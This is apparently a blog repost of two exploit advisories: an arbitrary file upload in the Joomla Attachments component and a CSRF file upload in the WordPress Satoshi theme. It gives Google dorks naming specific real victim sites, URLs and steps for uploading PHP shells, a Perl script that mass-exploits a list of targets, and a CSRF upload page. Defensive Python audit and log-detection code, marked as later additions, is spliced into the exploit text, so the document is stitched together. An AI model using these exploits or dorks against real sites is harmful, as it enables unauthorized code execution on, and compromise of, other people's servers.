Friday, June 28, 2019

Joomla Com_Attachments Components 3.x Arbitrary File Upload - DarkX7




####################################################################

# Exploit Title : Joomla Com_Attachments Components 3.x Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/05/2019
# Vendor Homepage : jmcameron.net
# Software Download Links : jmcameron.net/attachments/
jmcameron.net/attachments/updates/3.2.6/attachments-3.2.6.zip
joomlacode.org/gf/download/frsrelease/18688/83852/attachments-2.2.2.zip
joomlacode.org/gf/project/attachments/frs/
github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_attachments/
# Software Information Links : extensions.joomla.org/extension/attachments/
joomlacode.org/gf/project/attachments/
joomlacode.org/gf/project/attachments3/
# Joomla Affected Versions :
Joomla 3.4.8
Joomla 3.5.1
Joomla 3.6.5
Joomla 3.8.1
Joomla 3.8.11
Joomla 3.8.3
Joomla 3.9.6
# Software Affected Versions [ Component Com_Attachments ] : 
2.2.2 and 3.2.6 - 3.x / All previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : 
inurl:/index.php?option=com_attachments&task=upload
intext:Copyright (C) 2006-2020 BSA Troop 444. All Rights Reserved.
intext:Treadmill Desk from TrekDesk
intext:Copyright © 2015 Ashleigh-D. All rights reserved. Website designed by Mojosync Pty Ltd using Joomla
intext:Fundación Jesuitas Paraguay
intext:© 2019 Mars Society Polska
intext:Designed by atict.com
intext:Copyright © 2017. All Rights Reserved.Webaloss - Realizzazione siti webwebaloss.com
intext:Designed by Burosphere.
intext:Conselho Nacional de Recursos Hídricos CNRH Ministerio Do Desenvolvimento Regional
and more on Google and other Search Engines...... Have Fun....
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link [ Similar ] : dl.packetstormsecurity.net/1902-exploits/joomlaattachments326-shell.txt

####################################################################

# Description about Software :
***************************
The 'Attachments' extension allows files to be uploaded and attached to content
articles in Joomla. Includes a plugin to display attachments and a component
for uploading and managing attachments.

####################################################################

# Impact :
***********
Joomla Attachments Components 3.x and earlier versions could allow a
remote attacker to upload arbitrary files (including a shell), caused by improper validation
of file extensions by multiple scripts called through index.php. The issue occurs because
the application fails to adequately sanitize user-supplied input.
Exploiting this issue will allow attackers to execute arbitrary code within
the context of the affected application. This may facilitate unauthorized access
or privilege escalation; other attacks may also be possible.
By sending a specially crafted HTTP request, a remote attacker could exploit
this vulnerability to upload a malicious PHP script, which could allow the
attacker to execute arbitrary PHP code on the vulnerable system.

####################################################################

# Arbitrary File Upload/Unauthorized File Insertion Exploit :
****************************************************
/index.php?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme

/index.php?option=com_attachments&task=upload&uri=file&parent_id=[ARTICLE-ID-NUMBER]/&parent_type=com_content&tmpl=component&from=closeme

Click to " Select file to upload instead "  - Fill the Form -  Published =>  '' Yes '' and Click " Public "

Attach file: - Upload your .txt .jpg .gif .png .phtml .php;.gif file to the vulnerable system.

# Directory File Path :
********************
/attachments/article/[ARTICLE-ID-NUMBER]/kingskrupellos.txt
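
A defender-side check for the extension handling described above, as an added example that is not part of the original advisory or of the component's code: it audits stored attachment names and rejects any name in which a dot- or semicolon-separated segment is a server-executable extension, which covers the .phtml and .php;.gif names listed. The extension sets and the sample file listing are constructed assumptions.

```python
import re

# Assumption: extensions a PHP-capable web server may pass to an interpreter
# or treat as configuration. Extend to match the server's handler mappings.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "pht",
                   "phar", "phps", "cgi", "pl", "shtml", "htaccess"}
# Assumption: the attachment types this site actually wants to accept.
ALLOWED_FINAL_EXTS = {"txt", "jpg", "jpeg", "gif", "png", "pdf"}

def classify_upload_name(name):
    """Return 'allow' or a 'reject: ...' reason for an uploaded file name."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if "\x00" in base:
        return "reject: NUL byte in name"
    # Split on '.' and ';' so 'x.php;.gif' and 'x.php.jpg' expose 'php'.
    # Stripping each piece also catches trailing-dot/space names ('x.php. ').
    exts = [p.strip() for p in re.split(r"[.;]", base)][1:]
    exts = [e for e in exts if e]
    if not exts:
        return "reject: no extension"
    for ext in exts:
        if ext in EXECUTABLE_EXTS:
            return f"reject: executable extension '{ext}'"
    if exts[-1] not in ALLOWED_FINAL_EXTS:
        return f"reject: '{exts[-1]}' is not allowlisted"
    return "allow"

def audit_attachment_paths(paths):
    """Return {path: reason} for stored attachments that should not be served."""
    verdicts = ((p, classify_upload_name(p)) for p in paths)
    return {p: v for p, v in verdicts if v != "allow"}

# Constructed sample listing under the advisory's /attachments/article/ path.
SAMPLE_PATHS = [
    "/attachments/article/1/kingskrupellos.txt",
    "/attachments/article/1/minutes.pdf",
    "/attachments/article/7/banner.php;.gif",
    "/attachments/article/7/gallery.phtml",
    "/attachments/article/9/logo.PHP.jpg",
    "/attachments/article/9/readme",
]

if __name__ == "__main__":
    for path, reason in audit_attachment_paths(SAMPLE_PATHS).items():
        print(f"{path}: {reason}")
```

The same classify_upload_name() decision belongs in the server-side upload handler before the file is written; the audit only finds what has already been stored.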

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

source: https://packetstormsecurity.com/files/153088/Joomla-Attachments-3.x-File-Upload.html

WordPress Satoshi Themes 2.0 CSRF Arbitrary File Upload - DarkX7



####################################################################

# Exploit Title : WordPress Satoshi Themes 2.0 CSRF Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 05/06/2019
# Vendor Homepage : vooshthemes.com - tecnoge.com - netsons.com
# WordPress Affected Versions : 4.7.13 - 3.4.2
# Theme Affected Version : 2.0
# Information Link : themesinfo.com/satoshi-theme-wordpress-portfolio-jpx
themesinfo.com/?search_type=folder&search=satoshi
# Theme used on : 106 websites
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Design By Voosh Themes
inurl:/wp-content/themes/satoshi/ - intext:Design By TecnoGe Informatica - 
# Vulnerability Type : 
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description About Software :
*****************************
Satoshi v2.0 is a WordPress portfolio theme. A free portfolio theme developed by Voosh Themes.

####################################################################

# Impact :
***********
WordPress 3.4.2/4.7.13 Satoshi Themes 2.0 is prone to a vulnerability that lets attackers 
upload arbitrary files because it fails to adequately sanitize user-supplied input. 
An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access 
or privilege escalation; other attacks are also possible. This WordPress Theme is
vulnerable to CSRF file upload via ajaxupload.3.5.js. CSRF occurs when the web application 
does not, or cannot, sufficiently verify whether a well-formed, valid, consistent request 
was intentionally provided by the user who submitted the request.

####################################################################

# Vulnerability :
***************
/wp-content/themes/satoshi/upload-file.php

Vulnerability Message :
*********************
error

Directory File Path :
******************
/wp-content/themes/satoshi/images/[YOURFILENAME].html
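
Detection logic for the endpoint and upload directory named above, as an added example that is not part of the original advisory: it scans a combined-format access log for POSTs to upload-file.php, marks those whose Referer is not the site's own host (the cross-site case described under Impact), and lists files the same client then fetched from the images directory. The hostname, the log lines and the file names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

UPLOAD_PATH = "/wp-content/themes/satoshi/upload-file.php"  # from the advisory
IMAGES_DIR = "/wp-content/themes/satoshi/images/"           # from the advisory
SITE_HOST = "blog.example"  # assumption: the protected site's own hostname

# Combined log format: ip - - [time] "METHOD target PROTO" status size "referer"
LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"')

# Constructed sample lines (documentation addresses, invented file names).
SAMPLE_LOG = """\
198.51.100.7 - - [05/Jun/2019:10:00:01 +0000] "GET /wp-content/themes/satoshi/style.css HTTP/1.1" 200 5120 "https://blog.example/" "Mozilla/5.0"
203.0.113.9 - - [05/Jun/2019:10:02:11 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 7 "http://other.example/form.html" "Mozilla/5.0"
203.0.113.9 - - [05/Jun/2019:10:02:15 +0000] "GET /wp-content/themes/satoshi/images/note.html HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Jun/2019:10:05:40 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 7 "https://blog.example/wp-admin/themes.php" "Mozilla/5.0"
"""

def find_upload_events(log_text, site_host=SITE_HOST):
    """Return one finding per POST to the upload endpoint, in log order."""
    findings, latest_by_ip = [], {}
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # not combined format; skip rather than guess
        ip, method, target, status, referer = m.groups()
        path = urlsplit(target).path
        if method == "POST" and path == UPLOAD_PATH:
            ref_host = urlsplit(referer).hostname if referer != "-" else None
            finding = {
                "ip": ip,
                "status": int(status),
                # A missing Referer is also treated as cross-site (unknown origin).
                "cross_site": ref_host != site_host,
                "fetched": [],
            }
            findings.append(finding)
            latest_by_ip[ip] = finding
        elif (method == "GET" and status == "200"
              and path.startswith(IMAGES_DIR) and ip in latest_by_ip):
            # Same client retrieving a file from the upload directory afterwards.
            latest_by_ip[ip]["fetched"].append(path[len(IMAGES_DIR):])
    return findings

if __name__ == "__main__":
    for event in find_upload_events(SAMPLE_LOG):
        print(event)
```

Referer can be absent or stripped, so the cross_site flag is a triage signal; any POST to this endpoint on a site that does not use the theme's logo upload is worth reviewing.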

# Arbitrary File Upload / Unauthorized File Insert Perl Exploiter :
********************************************************
#!/usr/bin/perl
use LWP::UserAgent;
# Coded By KingSkrupellos
# Cyberizm Digital Security Army
# Perl Exploiter By CyBeRiZM :)
my $qqvul ="/upload-file.php";#theme path vul
my $datestring = localtime();
($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();

sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
flag();
print "[+] Enter List Of Target : ";
chomp (my $list=<>);
print "[+] Enter Evil File : ";
chomp (my $file=<>);
print "[+] Started : $datestring\n";
open(my $arq,'<'.$list) || die($!);
my @site = <$arq>;
@site = grep { !/^$/ } @site;
close($arq);
print "[".($#site+1)."] URL to test upload\n\n"; 
my $i;
foreach my $web(@site){$i++;
    chomp($web);
    if($web !~ /^(http|https):\/\//){
        $web = 'http://'.$web;
    }
print "[$i] $web \n";
expqq($web);#exploiting website :)
} 
sub expqq{
my $useragent = randomagent();#Get a Random User Agent 
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });#Https websites accept 
$ua->timeout(10);
$ua->agent($useragent);
print "[Testing] Exploit Existence \n";
my $url = $_[0]."/wp-content/themes/satoshi/".$qqvul;
my $ss = $_[0]."/wp-content/themes/satoshi/images/".$file;
my $response = $ua->get($url);
if ($response->is_success || $response->content=~/error/){
   print "[OK] Exploit Exists\n";
   print "[*] Sent payload\n";
   my $regex = 'success';
   my $body = $ua->post( $url,
        Content_Type => 'form-data',
        Content => [ 'uploadfile' => ["$file"] ]
   );
   if ($body->is_success ||$body->content=~ /$regex/){
      print "[+] Payload successfully executed\n";
      print "[*] Checking if shell was uploaded\n\n";
      my $res = $ua->get($ss);
      if ($res->is_success){
      print "[Upload] $_[0]/wp-content/satoshi/images/$file\n";
      }
      else {
      print "[Faild] check file\n";
      }
   } 
   else {print "[-] Payload failed : Not vulnerable\n";
   }
}
else {
print "[No] Exploit Not Found\n";
}
}
sub flag {print "\n[+] WP Satoshi Theme File Upload Exploiter By Cyberizm Digital Security Team \n[*] Coder => Cyberizm \n\n";
}

####################################################################

Cross Site Request Forgery CSRF Exploiter :
*****************************************
<!DOCTYPE html>
<html>
<head>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <title></title>
      <script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
      <script type='text/javascript' src="http://localhost/wp-content/themes/satoshi/js/ajaxupload.3.5.js"></script>

<script type='text/javascript'>//<![CDATA[ 
window.onload=function(){

 $(function(){
  var btnUpload=$('#upload');
  var status=$('#logo-upload-status');
  new AjaxUpload(btnUpload, {
   action: 'http://localhost/wp-content/themes/satoshi/upload-file.php',
   name: 'uploadfile',
   onSubmit: function(file, ext){
                /*
     if (! (ext && /^(jpg|png|jpeg|gif|html|txt)$/.test(ext))){ 
                    // extension is not allowed 
     status.text('Only HTML,TXT, JPG, PNG or GIF files are allowed');
     return false;
    }*/
    status.text('Uploading...');
   },
   onComplete: function(file, response){
    //On completion clear the status
    status.text('');
    //Add uploaded file to list
    if(response==="success"){
     $('<li></li>').appendTo('#files').html('<img src="http://localhost/wp-content/themes/satoshi/images/'+file+'" alt="" /><br />'+file).addClass('success');
     $('#satoshi_logo_image').val(file);
    } else{
     $('<li></li>').appendTo('#files').text(file).addClass('error');
    }
   }
  });
  
 });
}//]]>  
</script>

</head>
<body>
  
<span id="logo-upload-status"></span>
<input class="logo-name" id="satoshi_logo_image" type="text" name="satoshi_logo_image" value="">
<input type="button" class="background_pattern_button" id="upload" value="Choose Logo">
  
</body>
</html>

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

source:https://dl.packetstormsecurity.net/1906-exploits/wpsatoshi20-xsrfupload.txt